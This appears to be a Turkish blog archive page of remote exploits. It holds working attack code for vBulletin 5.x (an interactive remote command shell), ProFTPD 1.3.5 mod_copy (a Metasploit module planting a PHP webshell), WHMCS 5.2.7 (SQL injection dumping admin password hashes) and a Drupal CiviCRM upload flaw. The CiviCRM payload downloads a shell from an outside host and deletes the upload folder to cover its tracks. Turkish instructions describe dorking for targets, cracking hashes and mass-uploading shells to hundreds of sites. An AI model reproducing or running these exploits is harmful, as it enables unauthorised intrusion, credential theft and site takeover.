Archive for Remote Exploits

vBulletin 5.x – Remote Code Execution Exploit

wordpress-vulnerability

vBulletin 5.x – Remote Code Execution Exploit
vbulletin 5 versiyonlarıda bulunun uzaktan kod çalıştırma ve shell upload etme açığına ilişkin exploit

#[+] Title:  Vbulletin 5.x - Remote Code Execution Exploit
#[+] Product: vbulletin
#[+] Vendor: http://vbulletin.com
#[+] Vulnerable Version(s): Vbulletin 5.x
#
#
# Author      :   Mohammad Reza Espargham
# Linkedin    :   https://ir.linkedin.com/in/rezasp
# E-Mail      :   me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website     :   www.reza.es
# Twitter     :   https://twitter.com/rezesp
# FaceBook    :   https://www.facebook.com/reza.espargham
# Special Thanks : Mohammad Emad
 
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
 
use LWP::UserAgent;
use LWP::Simple;
$ua = LWP::UserAgent ->new;
 
print "\n\t Enter Target [ Example:http://target.com/forum/ ]";
print "\n\n \t Enter Target : ";
$Target=<STDIN>;
chomp($Target);
 
 
$response=$ua->get($Target . '/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:20:"echo%20$((0xfee10000))";}');
 
$source=$response->decoded_content;
if (($source =~ m/4276158464/i))
{
    $response=$ua->get($Target . '/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:6:"whoami";}');
    $user=$response->decoded_content;
    chomp($user);
    print "\n Target Vulnerable ;)\n";
    while($cmd=="exit")
    {
        print "\n\n$user\$ ";
        $cmd=<STDIN>;
        chomp($cmd);
        if($cmd =~ m/exit/i){exit 0;}
        $len=length($cmd);
        $response=$ua->get($Target . '/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:'.$len.':"'.$cmd.'";}');
        print "\n".$response->decoded_content;
 
   }
}else{print "\ntarget is not Vulnerable\n\n"}

ProFTPD 1.3.5 Mod_Copy Command Execution

ProFTPD 1.3.5 Mod_Copy Command Execution komut çalıştırma açığı bulunmuş olup açığa ilişkin metasploit exploit aşağıdaki gibidir.

##
# This module requires Metasploit: metasploit.com/download
# Current source: github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
 
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ProFTPD 1.3.5 Mod_Copy Command Execution',
      'Description'    => %q{
          This module exploits the SITE CPFR/CPTO commands in ProFTPD version 1.3.5.
          Any unauthenticated client can leverage these commands to copy files from any
          part of the filesystem to a chosen destination. The copy commands are executed with
          the rights of the ProFTPD service, which by default runs under the privileges of the
          'nobody' user. By using /proc/self/cmdline to copy a PHP payload to the website
          directory, PHP remote code execution is made possible.
      },
      'Author'         =>
        [
          'Vadim Melihow', # Original discovery, Proof of Concept
          'xistence <xistence[at]0x90.nl>' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2015-3306' ],
          [ 'EDB', '36742' ]
        ],
      'Privileged'     => false,
      'Platform'       => [ 'unix' ],
      'Arch'           => ARCH_CMD,
      'Payload'        =>
        {
          'BadChars' => '',
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic gawk bash python perl'
            }
        },
      'Targets'        =>
        [
          [ 'ProFTPD 1.3.5', { } ]
        ],
      'DisclosureDate' => 'Apr 22 2015',
      'DefaultTarget' => 0))
 
    register_options(
      [
        OptPort.new('RPORT', [true, 'HTTP port', 80]),
        OptPort.new('RPORT_FTP', [true, 'FTP port', 21]),
        OptString.new('TARGETURI', [true, 'Base path to the website', '/']),
        OptString.new('TMPPATH', [true, 'Absolute writable path', '/tmp']),
        OptString.new('SITEPATH', [true, 'Absolute writable website path', '/var/www'])
      ], self.class)
  end
 
  def check
    ftp_port = datastore['RPORT_FTP']
    sock = Rex::Socket.create_tcp('PeerHost' => rhost, 'PeerPort' => ftp_port)
 
    if sock.nil?
      fail_with(Failure::Unreachable, "#{rhost}:#{ftp_port} - Failed to connect to FTP server")
    else
      print_status("#{rhost}:#{ftp_port} - Connected to FTP server")
    end
 
    res = sock.get_once(-1, 10)
    unless res && res.include?('220')
      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner")
    end
 
    sock.puts("SITE CPFR /etc/passwd\r\n")
    res = sock.get_once(-1, 10)
    if res && res.include?('350')
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end
 
  def exploit
    ftp_port = datastore['RPORT_FTP']
    get_arg = rand_text_alphanumeric(5+rand(3))
    payload_name = rand_text_alphanumeric(5+rand(3)) + '.php'
 
    sock = Rex::Socket.create_tcp('PeerHost' => rhost, 'PeerPort' => ftp_port)
 
    if sock.nil?
      fail_with(Failure::Unreachable, "#{rhost}:#{ftp_port} - Failed to connect to FTP server")
    else
      print_status("#{rhost}:#{ftp_port} - Connected to FTP server")
    end
 
    res = sock.get_once(-1, 10)
    unless res && res.include?('220')
      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner")
    end
 
    print_status("#{rhost}:#{ftp_port} - Sending copy commands to FTP server")
 
    sock.puts("SITE CPFR /proc/self/cmdline\r\n")
    res = sock.get_once(-1, 10)
    unless res && res.include?('350')
      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying from /proc/self/cmdline")
    end
 
    sock.put("SITE CPTO #{datastore['TMPPATH']}/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n")
    res = sock.get_once(-1, 10)
    unless res && res.include?('250')
      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying to temporary payload file")
    end
 
    sock.put("SITE CPFR #{datastore['TMPPATH']}/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n")
    res = sock.get_once(-1, 10)
    unless res && res.include?('350')
      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying from temporary payload file")
    end
 
    sock.put("SITE CPTO #{datastore['SITEPATH']}/#{payload_name}\r\n")
    res = sock.get_once(-1, 10)
    unless res && res.include?('250')
      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying PHP payload to website path, directory not writable?")
    end
 
    sock.close
 
    print_status("#{peer} - Executing PHP payload #{target_uri.path}#{payload_name}")
    res = send_request_cgi!(
      'uri' => normalize_uri(target_uri.path, payload_name),
      'method' => 'GET',
      'vars_get' => { get_arg => "nohup #{payload.encoded} &" }
    )
 
    unless res && res.code == 200
      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure executing payload")
    end
  end
 
end

WHMCS 5.2.7 SQL Injection Vulnerabilitiy

Açığın Kullanımına ilişkin açaklama;
1- python exploit indir
2- c:\python ana dizine at
3- “powered by whmcompletesolution” şeklinde arat
4- register.php ye tıkla ve üye ol
5- exploite url yi kaydet
6- komut sisteminden python 28807.py komutunu ver
7- açık varsa görüldüğü gibi md5 hashı görünecektir
8- googleden md5 crack sitelerini bul dene veritabanlarında kayıtlıysa kırılacaktır.

#!/usr/bin/env python
# 2013/10/03 - WHMCS 5.2.7 SQL Injection
# http://localhost.re/p/whmcs-527-vulnerability

url = 'http://clients.target.com/' # wopsie dopsie
user_email = 'mysuper@hacker.account' # just create a dummie account at /register.php
user_pwd = 'hacker' 

import urllib, re, sys
from urllib2 import Request, urlopen
ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"

def exploit(sql):
	print "Doing stuff: %s" % sql
	r = urlopen(Request('%sclientarea.php?action=details' % url, data="token=%s&firstname=%s&lastname=1&companyname=1&email=%s&paymentmethod=none&billingcid=0&address1=1&address2=1&city=1&state=1&postcode=1&country=US&phonenumber=1&save=Save+Changes" % (user[1], 'AES_ENCRYPT(1,1), firstname=%s' % sql, user_email), headers={"User-agent": ua, "Cookie": user[0]})).read()
	return re.search(r'(id="firstname" value="(.*?)")', r).group(2)

def login():
	print "Getting CSRF token"
	r = urlopen(Request('%slogin.php' % url, headers={"User-agent": ua}))
	csrf = re.search(r'(type="hidden" name="token" value="([0-9a-f]{40})")', r.read()).group(2)
	cookie = r.info()['set-cookie'].split(';')[0]
	print "Logging in"
	r = urlopen(Request('%sdologin.php' % url, data="username=%s&password=%s&token=%s" %(user_email, user_pwd, csrf), headers={"User-agent": ua, "Cookie": cookie})).read()
	if 'dologin.php' in r:
		sys.exit('Unable to login')
	else:
		return [cookie, re.search(r'(type="hidden" name="token" value="([0-9a-f]{40})")', r).group(2)]

user = login()
print exploit('(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins)') # get admins
print exploit('(SELECT * FROM (SELECT COUNT(id) FROM tblclients) as x)') # just get a count of clients

# oh you want to be evil
#exploit("'DISASTER', password=(SELECT * FROM (SELECT password FROM tblclients WHERE email='%s' LIMIT 1) as x)#" % user_email)

nginx 1.3.9/1.4.0 x86 Brute Force Remote Exploit

nginx 1.3.9/1.4.0 x86 Brute Force Remote Exploit sayesinde uzaktan bir servere erişim sağlanmakta root yetkisi vermesede permission olmayan dizinlere işlem imkanı vermektedir. Read more

Drupal civicrm module remote file upload Vulnerability

Drupal civicrm modülünde tarafımdan remote file upload açığı bulunmuştur.
Açığın oluşum yeri /sites/all/modules/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php kaynaklanmakta olup, ofc_upload_image.php?name=Shell.php post edildiğinde sites/all/modules/civicrm/packages/OpenFlashChart/tmp-upload-images/ klasörüne php code upload edilebilmekte servere erişim sağlanabilmektedir. Çok önemli sitelerde gördüğüm bu açık nedeniyle açık tarafımdan public edilmiştir.
Aşağıda yazmış civicrm remote file upload exploitiyle localhosttan php komutu çalıştırılmak suretiyle çok kısa zamanda yüzlerce siteye Shell upload edilebilmekte, Shell değişik dizinlere kopyaanarak upload edildiği dizin klasörü imha edilerek açık kapatılmaktadır.
aynı scriptin joomla eklentisi buradaki sitemizde yayınlanmıştır.
Php exploit ve açığın kullanım şekli aşağıdaki gibidir.

# Exploit Title: Drupal civicrm module remote file upload exploit
# Google Dork:"Index of /sites/all/modules/civicrm/packages/OpenFlashChart/"
# Date: 20/04/2013
# Exploit Author: iskorpitx
# Vendor Homepage: http://civicrm.org
# Software Link: http://sourceforge.net/projects/civicrm/files/civicrm-stable/4.2.2/civicrm-4.2.2-drupal.tar.gz/download
# Version: [civicrm 4.2.2]
# Tested on: Win8 Pro x64
# CVE : http://www.securityweb.org

<!--?php     # Drupal module civicrm OpenFlashCart ofc_upload_image.php remote file upload exploit # http://www.securityweb.org & http://www.security.biz.tr # multithreading mass c:\appserv\www-->exp.php -u http://target.com/ -f post.php

$options = getopt('u:f:');

if(!isset($options['u'], $options['f']))
die("\n        Usage example: php jnews.php -u http://target.com/ -f post.php\n
-u http://target.com/    The full path to Drupal!
-f post.php             The name of the file to create.\n");

$url     =  $options['u'];
$file    =  $options['f'];

$shell = "{$url}sites/all/modules/civicrm/packages/OpenFlashChart/tmp-upload-images/{$file}";
$url   = "{$url}sites/all/modules/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name={$file}";

$data      = '<!--?php   system("wget http://www.securityweb.org/shell.txt; mv shell.txt post.php");  system("cp post.php ../../../../../../../tmp/post.php");  system("cd ..; rm -rf tmp-upload-images");  echo "by iskorpitx" ;   fclose ( $handle );   ?-->';
$headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1',
'Content-Type: text/plain');

echo "        [+] Submitting request to: {$options['u']}\n";

$handle = curl_init();

curl_setopt($handle, CURLOPT_URL, $url);
curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
curl_setopt($handle, CURLOPT_POSTFIELDS, $data);
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);

$source = curl_exec($handle);
curl_close($handle);

if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($shell, 'r'))
{
echo "        [+] Exploit completed successfully!\n";
echo "        ______________________________________________\n\n        {$shell}?cmd=system('id');\n";
}
else
{
die("        [+] Exploit was unsuccessful.\n");
}

?>